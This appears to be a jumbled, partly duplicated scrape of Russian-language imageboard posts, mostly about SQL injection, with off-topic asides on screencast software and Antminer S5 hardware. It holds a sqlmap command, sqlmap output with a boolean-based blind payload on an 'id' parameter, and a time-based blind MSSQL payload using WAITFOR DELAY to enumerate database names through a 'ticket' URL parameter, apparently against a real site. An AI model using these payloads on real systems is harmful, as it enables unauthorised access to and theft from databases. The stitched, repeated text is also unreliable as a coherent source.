Windows

Parameter: id (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY

sqlmap -u ссылка/id' --random-agent

Парни подскажите нормальную программу для записи скринкаста

sqlmap -u ссылка/id' --random-agent

Парни подскажите нормальную программу для записи скринкаста

Аноны, прошу вашей помощи. Возможно ли такое найти без sqlmap'ов и прочих программ такую уязвимость?:
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
name),5,1))>104) WAITFOR DELAY '0:0:1'--
qvAV&after=1523013041889&lang=de&_dc=1523013101769

Да я уже всё посмотрел. S5 — это не асик, а майнер, который сделан на основе охуя (70-80?) асиков BM1??? (хотя я даже в первых трёх символах не уверен, да не суть). Все они объединены в какую-то цепь и весь их кремний заточен на высчитывание хэшей. Анивей, принципиалочки или, что лучше, схемы архитектуры я так и не нашёл, но пнятненько одно: на верху всего этого порно сидит копия биглебона, хостит линь и какую-то, вполне возможно, проприетарненькую фирмварь для управления асиками. Ну и сопутствующей периферией, офк. Дальше я пошёл читать шота другое.

Аноны, прошу вашей помощи. Возможно ли такое найти без sqlmap'ов и прочих программ такую уязвимость?:
/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
name),5,1))>104) WAITFOR DELAY '0:0:1'--
qvAV&after=1523013041889&lang=de&_dc=1523013101769

Parameter: id (GET)
   Type: boolean-based blind
   Title: AND boolean-based blind - WHERE or HAVING clause
   Payload: id=56' AND 3243=3243 AND 'VvcY'='VvcY